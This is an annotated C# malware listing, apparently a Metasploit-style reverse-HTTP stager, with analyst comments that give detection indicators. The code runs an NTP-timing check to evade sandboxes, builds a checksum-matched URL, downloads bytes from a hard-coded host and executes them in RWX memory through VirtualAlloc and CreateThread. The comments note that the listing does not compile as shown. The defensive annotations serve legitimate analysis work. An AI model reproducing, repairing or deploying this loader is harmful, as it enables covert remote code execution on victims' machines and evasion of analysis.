- using System;
- using System.Net;
- using System.Net.Sockets;
- using System.Linq;
- using System.Runtime.InteropServices;
- using System.Threading;
- namespace payload
- {
// rev_http: console program whose Main() (1) compares two NTP readings taken around a
// 32-second sleep, (2) downloads a byte array over plain HTTP from a hard-coded host, and
// (3) copies those bytes into executable memory and runs them on a new thread.
// Analyst summary of observables visible in this listing:
//   - DNS lookups and UDP/123 traffic to us.pool.ntp.org, twice, about 32 seconds apart
//   - HTTP GET to 192.168.1.6:4433 (an RFC 1918 private address) with a four-character path
//   - fixed User-Agent "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
//   - kernel32 VirtualAlloc with protection 0x40 followed by CreateThread at the same address
// NOTE(review): the class name and the checksum value 92 used below are consistent with a
// Metasploit reverse-HTTP style stager; that attribution is inferred, not stated in the paste.
- class rev_http
- {
// Returns a string of length s whose characters are drawn from a fixed 62-character
// alphanumeric alphabet using the supplied Random instance.
- static string randomString(Random r, int s)
- {
- char[] buffer = new char[s];
- string chars = "kHp1adhiY7qmJQcNZOtMKCX2Iw0eunx8fjE96sAUoGT5WF3rVgyBPzblRvLDS4";
- for (int i = 0; i < s; i++)
- {
- buffer[i] = chars[r.Next(chars.Length)];
- }
- return new string(buffer);
- }
// Returns true when the sum of the UTF-16 code units of s, modulo 256, equals 92.
// Detection note: every request path this program builds satisfies this predicate, so the
// same sum-mod-256 test can be applied to URL paths in proxy or IDS logs.
// NOTE(review): 92 matches the value Metasploit's HTTP handler uses to recognise a Windows
// stage request (URI_CHECKSUM_INITW) - confirm against the handler in use.
- static bool checksum8(string s)
- {
- return ((s.ToCharArray().Select(x => (int)x).Sum()) % 0x100 == 92);
- }
// Builds a four-character URL path that passes checksum8().
// Makes up to 64 attempts; each attempt picks a random three-character prefix and then tries
// each of 62 candidate fourth characters. Returns the first passing string, or the constant
// "9vXU" (which itself sums to 92 mod 256) if no attempt succeeds.
- static string genHTTPChecksum(Random r)
- {
- string baseString = "";
- for (int i = 0; i < 64; ++i)
- {
- baseString = randomString(r, 3);
- //62
// The sort key is a random boolean, so this only partitions the alphabet into two groups
// rather than producing a uniform shuffle.
- string randChars = new string("czPRh9FVwebjIaTWgdKil1H2yMoUXksrvZGDQEJYSntOx0BC7qmNL58uAf346p".ToCharArray().OrderBy(s => (r.Next(2) % 2) == 0).ToArray());
- for (int j = 0; j < randChars.Length; ++j)
- {
- string urlName = baseString + randChars[j];
- if (checksum8(urlName))
- {
- return urlName;
- }
- }
- }
- return "9vXU";
- }
// Downloads the resource at URL str with System.Net.WebClient and returns the raw bytes.
// Returns null when the response is shorter than 100000 bytes or when a WebException is
// thrown (the exception is swallowed and s is still null at that point).
// Detection note: the four request headers are constant; the User-Agent in particular
// ("MSIE 6.1") is a stable network signature for this sample.
// The WebClient is never disposed.
- static byte[] getData(string str)
- {
- WebClient webClient = new System.Net.WebClient();
- webClient.Headers.Add("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");
- webClient.Headers.Add("Accept", "*/*");
- webClient.Headers.Add("Accept-Language", "en-gb,en;q=0.5");
- webClient.Headers.Add("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7");
- byte[] s = null;
- try
- {
- s = webClient.DownloadData(str);
- if (s.Length < 100000) return null;
- }
- catch (WebException) { }
- return s;
- }
// Executes the downloaded bytes inside the current process; does nothing when s is null.
// Sequence: VirtualAlloc (0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE), Marshal.Copy
// of the buffer into that region, CreateThread with the region as start address, then
// WaitForSingleObject with 0xFFFFFFFF (INFINITE).
// Detection note: a managed process that allocates RWX memory and immediately starts a
// thread inside it is the behaviour endpoint telemetry should alert on; no file is written.
// Return values of VirtualAlloc and CreateThread are not checked.
- static void inject(byte[] s)
- {
- if (s != null)
- {
- UInt32 funcAddr = VirtualAlloc(0, (UInt32)s.Length, 0x1000, 0x40);
- Marshal.Copy(s, 0, (IntPtr)(funcAddr), s.Length);
- IntPtr hThread = IntPtr.Zero;
- UInt32 threadId = 0;
- IntPtr pinfo = IntPtr.Zero;
- hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
- WaitForSingleObject(hThread, 0xFFFFFFFF);
- }
- }
// Entry point. Takes two NTP readings separated by Thread.Sleep(32 s) and only proceeds to
// download and execute when the second reading is at least 32 s later, or when either NTP
// exchange failed (skip == true).
// NOTE(review): presumably a check for analysis environments that shorten sleeps - inferred
// from the structure, not stated in the paste.
// Defender caveat: because skip == true also satisfies the condition, blocking DNS or
// UDP/123 does not prevent the download step.
- static void Main()
- {
// 48-byte NTP packets; first byte 0x1B encodes LI = 0, version 3, mode 3 (client request).
- var NTPTransmit = new byte[48];
- NTPTransmit[0] = 0x1B;
- var secondTransmit = new byte[48];
- secondTransmit[0] = 0x1B;
- var skip = false;
- var addr = Dns.GetHostEntry("us.pool.ntp.org").AddressList;
- var sock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
- try
- {
- sock.Connect(new IPEndPoint(addr[0], 123));
- sock.ReceiveTimeout = 6000;
- sock.Send(NTPTransmit);
- sock.Receive(NTPTransmit); sock.Close();
- }
// Any failure (including the 6 s receive timeout) sets skip; the socket is not closed on this path.
- catch
- {
- skip = true;
- }
// Bytes 40..43 are read big-endian: the seconds part of the NTP transmit timestamp,
// counted from 1900-01-01 UTC.
- ulong runTotal = 0;
- for (int i = 40; i <= 43; ++i)
- {
- runTotal = runTotal * 256 + (uint)NTPTransmit[i];
- }
- var time1 = (new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * runTotal);
- Thread.Sleep(32 * 1000);
- var newSock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
- try
- {
- var addr2 = Dns.GetHostEntry("us.pool.ntp.org").AddressList;
- newSock.Connect(new IPEndPoint(addr2[0], 123));
- newSock.ReceiveTimeout = 6000;
- newSock.Send(secondTransmit);
- newSock.Receive(secondTransmit);
- newSock.Close();
- }
- catch
- {
- skip = true;
- }
- ulong secondTotal = 0;
- for (int i = 40; i <= 43; ++i)
- {
- secondTotal = secondTotal * 256 + (uint)secondTransmit[i];
- }
// NOTE(review): `t1` is not declared anywhere in the visible listing, so the paste does not
// compile as shown. TimeSpan.Seconds is the 0-59 seconds component, not the total.
- if (((new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * secondTotal) - t1).Seconds >= 32 || skip)
- {
// Random is seeded from the local clock; the URL is a hard-coded host and port plus the
// checksum path, fetched over unencrypted HTTP.
- Random WTHFHfSFwf = new Random((int)DateTime.Now.Ticks);
- byte[] KnPUqLweupSUTd = getData("http://192.168.1.6:4433/" + genHTTPChecksum(WTHFHfSFwf));
- inject(KnPUqLweupSUTd);
- }
- }
// kernel32 P/Invoke declarations. Parameter names are random strings; by position they
// correspond to the documented Win32 parameters:
//   VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
//   CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId)
//   WaitForSingleObject(hHandle, dwMilliseconds)
// Static-analysis note: this trio of imports in one managed assembly is a common triage
// indicator for in-memory code execution.
- [DllImport("kernel32")]
- private static extern UInt32 VirtualAlloc(UInt32 MOHHihtHuKLCD, UInt32 imlHarLkgZ, UInt32 zJGnTkxid, UInt32 UyqoMcQNxYUIlU);
- [DllImport("kernel32")]
- private static extern IntPtr CreateThread(UInt32 hahkGAnKO, UInt32 bxZIGGS, UInt32 oarivwSN, IntPtr TYKTHkbceeEJUr, UInt32 GdFMDWJStrTPBx, ref UInt32 ULfFYCrSfa);
- [DllImport("kernel32")]
- private static extern UInt32 WaitForSingleObject(IntPtr tPMBff, UInt32 wvwtGBedj);
- }
- }